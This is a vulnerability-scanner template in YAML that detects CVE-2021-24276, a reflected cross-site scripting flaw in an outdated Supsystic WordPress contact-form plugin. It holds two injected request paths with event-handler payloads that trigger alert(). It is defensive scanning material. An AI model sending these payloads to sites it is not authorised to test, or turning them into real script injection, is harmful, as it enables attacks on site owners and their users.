32 lines
799 B
YAML
32 lines
799 B
YAML
|
id: CVE-2021-24276
|
||
|
|
||
|
info:
|
||
|
name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
|
||
|
author: dhiyaneshDK
|
||
|
severity: low
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
|
||
|
tags: wordpress,cves,cve2021
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//'
|
||
|
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- 'alert(/XSS/)/'
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "text/html"
|
||
|
part: header
|